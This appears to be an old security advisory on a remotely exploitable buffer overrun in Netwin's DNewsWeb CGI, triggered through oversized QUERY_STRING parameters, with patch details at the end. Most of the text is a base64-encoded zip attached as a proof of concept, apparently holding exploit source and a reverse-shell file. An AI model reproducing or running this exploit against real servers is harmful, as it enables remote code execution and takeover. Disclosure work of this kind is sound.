COMMAND
DNewsweb
SYSTEMS AFFECTED
*nix/Win32 Web Servers running Dnewsweb
PROBLEM
Following is based on Cerberus Information Security Advisory by
Mark Litchfield. The Cerberus Security Team has found a remotely
exploitable buffer overrun in Netwin's DNewsWeb (dnewsweb /
dnewsweb.exe v5.3e1), CGI program designed to give access to NNTP
services over the world wide web. By supplying a specially
formed QUERY_STRING to the program a buffer is overflowed
allowing execution of arbitrary code compromising the web server.
The are several unchecked buffers in this program where several
of the QUERY_STRING parameters can be overflowed such as "group"
and "utag". This overflow is simple to exploit by overwriting the
saved return address with an address that contains a "jmp esp" or
"call esp" - the remainder of the the QUERY_STRING is pointed to
by the ESP.
This vulnerability was noticed some time ago by plaguez and the
attached code was written as "proof-of-concept":
---
Content-Type: application/octet-stream; name="admdnews.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="admdnews.zip"
Content-MD5: 4d4u2Sx6Bq6TK1mEwSjCPA==
UEsDBBQAAAAIAANvpig5nIDcIAoAANIcAAAMAAAAQURNRE5ld3MuY3BwtVh7cxo5Ev+brcp3
aJOLPeAxngd2Hn5siCGJLw64DEnuKvFRw4wGtB7PsCMBjrdyn/1amgcSxol9dRcnmJZarV+/
W9mt15/8Vq/XK5UKtNof4fzi9HNr0IF2D7q9AbRP+4OL0zefcOXp66cb9U38kPwrHyAOt7tk
wYZzB3bgC427g138dD7AzYt9IDfTKKEcwiSFLuG4AcZisWjEhC9ozCgnDT+5rhVQKgAgpQEj
6ZykYMz3GlaIgvG3S9wajGdTf0wb5IbsBjEyLshIEHDy7pQ1lrgqMJhQBtM0GafedQGDAZ8Q
GM3CEEUnKD+MkgX4SRxQTpMYEN3P5OcaLyY0IkK0Txij8VgKrfrXQRWmHt5GOEkbcJKSIFc8
oMwXt2W8CGs+i2KSeiMaUf4dxglBYEkufRp54xm5hcM4mI0IeR2EjXR2DMYf7gKubP8KmozB
KLU2Nmrw6jg7lB8dEMZJAF4cCJ1Cml4jNYsDVFb6BZoNC/rne7v9833YhMxLbwj3wIWLEweM
0YxGATi286KmuvgT88bkVelpOJxTn9Pr9wnjxwVxnqQK4fEJEmROo5xJfM1ZpIzPJGVo8WPV
Y29pyjg6ns+mgPHhexzQJ4oUnkBEUcW4XJciVRmdm1cQ+7ATwc5UvXVnjn/18EAx6SyWziui
1Bt7GJRcVxAjoIhGca2q7mJCUpIbSVOdZpE2RQKSUH4vfB7JWGqs2EGcQM0LT3q+n6SBjJck
O53xFcK0HJl6/hU6CL4nM/DSXBuOhxtwHhGPkVzlKEmuRIgXSTETbsUFDNFrT8a/CFYh3k8C
DEmEkBI2FdmRASGeP8kB5niUjMPwe3/ah5NeuwP4u9c9+ye87V1Ap/3ppDU47XVbZ3D+6eK8
1+/0G/Cp38lYTrvQ6kIHz54gw8dWt9u50KTqv2z0zkcv9SfgWJal7/09Id+HQzhEO/hePEwF
3GvyepLwa49Gos4cS9bdJ789pbEfzQICh1iFgmTBGpNjdZXxgCZyLfvZRTQVzJeXN8CFC5lY
ZByt5mOCMTqOMdNozGEgdjv986/2JRzBX9bNvrv/0m3+OPgJ+1saRX16S/IzqFhzx3b2Xv70
0JeUSiStIEjLy5q2sIo4J5Rcws5Tv4AuNn8K/jnKq6A8y7LtfW/kmyim+ANy2Qkdsn45tB6z
TF48atlXVoWaD7FqpoywqiqzIgPo/7eiLvwCqebKpekzZ2qSM0s0m817Nlzy2I2m/eiN5op2
uXriZ57QAMsLajYceTGWOwP7yF/ILNdCMKplD9l56NTxLa7WDlQRhl/LbP6QhL9zepy6Lr/F
67HOJYvIHA6pT0wv5jTCFm3m3decJCm9TWLzxptOvNiMSRKzWTompugPgRnMrsjQZDz14pck
NcOUkLN+22zTd5SbV3yRmFdRMjb9CUFZaTg1PX+KsZh+i3NAP9aYLK+pTDeaUf0W512C6doY
VQv1WA4soM9Kq8w27mgjjWAL9lbZnDVsVrjK5a7j+sNZZWuuYXNGd9j21rLd0WB/nQalorpJ
SSya2HtyY/gTL63D5pTdDjz0IDdl5tE33znJDV0v97a3sZBuPdsSt7L8WuVg9Znl/KNqZodx
grJuwjBDWAo4clQooySJAJtoEs0JGP3eyYdWu30xxKa36cUi303I4E1w1Mi/T3G0yIG97/UH
HSzeE0YOFLKOLfoINvPVsqBECbZpD4WW+VjJLmnglDoMvWsafcdzrbd4f2eATDhsg8IhLsb9
CRcx6PGEGhJKLedEcRQz6LQrVej2uh04OgJDXIinKE5sQ/HdEKrUaqhBRaiAZ4zup7MzyStx
o5UEy+h7jKNywQ2yoqQ4+6X4Qgi9iBFpWFUDIb3RH85i/MhvrRuGrn69hpfsHE8kw1BMi1+t
S6lCBZ1SIZGYhn4ltbRhDsjg6YzcDTEsMrEhYgk97xeOxO/zr5e5/7IlDI4L8ifKrb7rDOAZ
+x2fCkfPmPiB94PB+a7dsL9haRDj5ivcF9/Fv+pBLgKkgDez8Ov+3p67f6msiy63dgPbuFxv
qov9CYmiE8yLu0ckTCENcQp/aesobN1yKU7Z1NobLZqwSVGESdVOlxn47elZpw5hX87fd89n
60KCcnG2iCqINfz7pd9qtwYtWDCv7XFPrKqZls3l+ZXajngeqOvoHXYXA6Y71t9lTun9Lccg
MkOEARzC8zL0i7qVv5+e/U9fThgfZhZt1iVkubLaRuQiuaHcsMsMKIKhvkQiIl7IsZehUl9C
K3adu7vidZPvuspuAb7Ya67sqVL3lD1Z2nP1in0ZoLl9yzKShwvyhMkUn3EGVFMi1CY7TITk
ztxG21TTUVWpQ+UEsJhYEM5urNQNIGgCm0aWzcG3Avf3ouFkRnNKo4WMkKviWhNw9Oh3Oh+G
nW5bsihhKjBxhFCClAz3nO93Bln3KCMajxuZMWrXXhQlvqHIzkThlBMYyxOmbSospnarHyWM
aEAEWLSwsK6o76rFM03UDEWuu/OpOH55IAUVyV3wlRO35MFevZK+NCsj5SsjEyVRQaWsMkXp
EhtlEwcj2zcNY4StF6v8ppBWq4nq/kBO+8GczoM53YyzXqIXI7J06Tp1svW8yJa1W7oKH94G
PbIO6GFp1gO6vS2iV0oXi9lw0toqbswEKTeukyyyKxH/p/Gld9GGxUcaZ/7HY7ZlS7eEBliw
cQRYR/vcS/lsahSMJmzmVRVqcDeVYgsWdnxrWVfuhp47bpE7T7Lc3TDyKchYlmNzWYLMZb1R
UhYBnUTEixGQUuDExUX+zm2f29cwsRjfnVopX0HRvBdFUfrNoliZRWV61P3u3I7uvX1PuR0H
lbb0AAbPMnm3rRsnxOEHx6eV1nj/AfcFkScKDdYOMbmEewT4dwWISW8Zompj16eG1WBVMlyE
K0i7CVOL5JbRK1cqbEG5PwEFyVd6mbNXKr7HCFivFMJWCUclXJVoqsSeSuyrxHOVeKESL7VL
dQgaBlsDYWsobA2GreGwNSC2hsTWoNgaFkfD4uj20LA4GhZHw+JoWBwNi6NhcTQsjobF1bC4
GpatnS2NfKaT/9bJbZ081MljndzUyX/p5N908qlOvtbJDZ3c1clv3wp6peaXkW/qcXuQc4+w
GV8dyAQvhUEpq65KyIr39tb6owEJvVnE7z+p3Z+/PFdF4VcxrGQfxUvnERqJc3U9+5Xm8tOa
8KR4G35unZ22h/kwLWY1JtgT/4pwI3944vCD28P+4KLT+mjC6fn5RW/QGw5Ozh9UepnlX7kc
uFUU/7wWrxTffXXiFdhki8NWGBOfG8xEZPiq87kEJ9999dqm0puAYU1LwlUuBaKcrnLVWHbz
/ah9K45d/9ewn6uwi/+BKJ5/ZvaSNJfjt6m7NOv8Zj6tLNtrrXCRsWMLrzASB2iDUi4qGZG4
vKdmWv+lmmP0TOr+OXPZr1V9obTH4qWEs7m3sVEy3r179WopyRJff/wHUEsDBBQAAAAIAAWi
WChBLhC4WQMAAO0EAAAQAAAAcmV2ZXJzZS1zaGVsbC12MZ1TXWgUVxQ+s5lqIlt3hRR8sL9s
QVBCN6IECTHbbNakpmF2tuzYQBPWnRvczbobZmfbtBRlyO7DdDo0Dx0KIoGWEkqhvkWxIK6u
JChSMQ8++FCq+BNM6k8ECRFyPWd2FpsHX3oe9pz7fd/97rln70wZd+EJ55YYMpYhCPDfYhEw
vjD+fR+TPfvYB3DhGoZybhsCz35V+V4SqOaHlC7Ak/UTo8aBT4f0ZuMxOSw9tZROYW3U2C/1
lu5ZQxPCC6voF9aNrjGm5VHVdahXHiwtGMdFltvTrrdg0Tuwp71UVX94gywnL4v27FYRYLGM
Z5uVS03UxzsEFF1gjoDzu0WCr2K92OYj4CcXeEjA2wgYy1MCwGdHBfzlDsHGZUJaqoHKXcxZ
yApZH3ceITO5ygPl6wiatWzQrnyDkJTgzvMG9QfpkfjOI9YaxI+ukV35nQi7Ml1PJylx568m
97RyYaNopp5+2Sj6BEWTy1Hz9rwQxSHE49y5idTh8IJlk5/Z12HZM27RafZ1z3fvpouNznd/
hDaSLMtZQZbtyp/kmsULX/V8V9yJRvHfxfFY/pD5IHwlbs+eQToZx1NmqQ/uLHjyGsm7QO/M
QvIobVEailue4meg2/B9Cs5hvTGH7wls584dBJamwwt2rNnua05Kclz+eD4mSmhrJpvNYb+Z
DJrDrdzZIro79SQqaaKbRHIvHbRjwVfLbzsC5UHOeRbqrSDhqxPvBsp7XSIpYYPTboN/1xus
7EAClStNbp/OfcxWNOQ3fjtFrwtfaLhaU7gz58r1D6Rw1bzYv3K6Y7P+lsL1kMgdenHmJmMO
z4Klfw7XrEPbrcR7wpq8uBPcNrdMXhL7S0/D1aXtu1pDNx5aPSFhNXC2NWj17BBWLXFKWB2q
JZV40/5wNXBma+zZTMuVktD9+chwzQcbwwfX3IDXhN/LgpfTx9Q2NsFeJ/9fETjIdEkrpCOq
qrFiEd4cKKTUgcwRLaV9HQH6bOlLbVNzOejRWEpnJEZhpLHMjDOQGBsbTB1jqrtCx4Se0vTS
eH9+tBABmaXUWCbHQNEyOnOrRI6xceidyOieHcBXxUJ6zDtJSUQ8ByCU6ZDOFYrMq49k8iqk
C/k8S+tQZLjQWPpLGBnBbbFofzHBCM4RCy8BUEsBAhQAFAAAAAgAA2+mKDmcgNwgCgAA0hwA
AAwAAAAAAAAAAQAgALaBAAAAAEFETUROZXdzLmNwcFBLAQIUABQAAAAIAAWiWChBLhC4WQMA
AO0EAAAQAAAAAAAAAAAAIQAkgUoKAAByZXZlcnNlLXNoZWxsLXYxUEsFBgAAAAACAAIAeAAA
ANENAAAAAA==
-----
SOLUTION
Netwin has made available a patch for this available from their
ftp server:
ftp://ftp.netwinsite.com/pub/dnewsweb/beta/
Obtain the 5.4c3 version required for your system.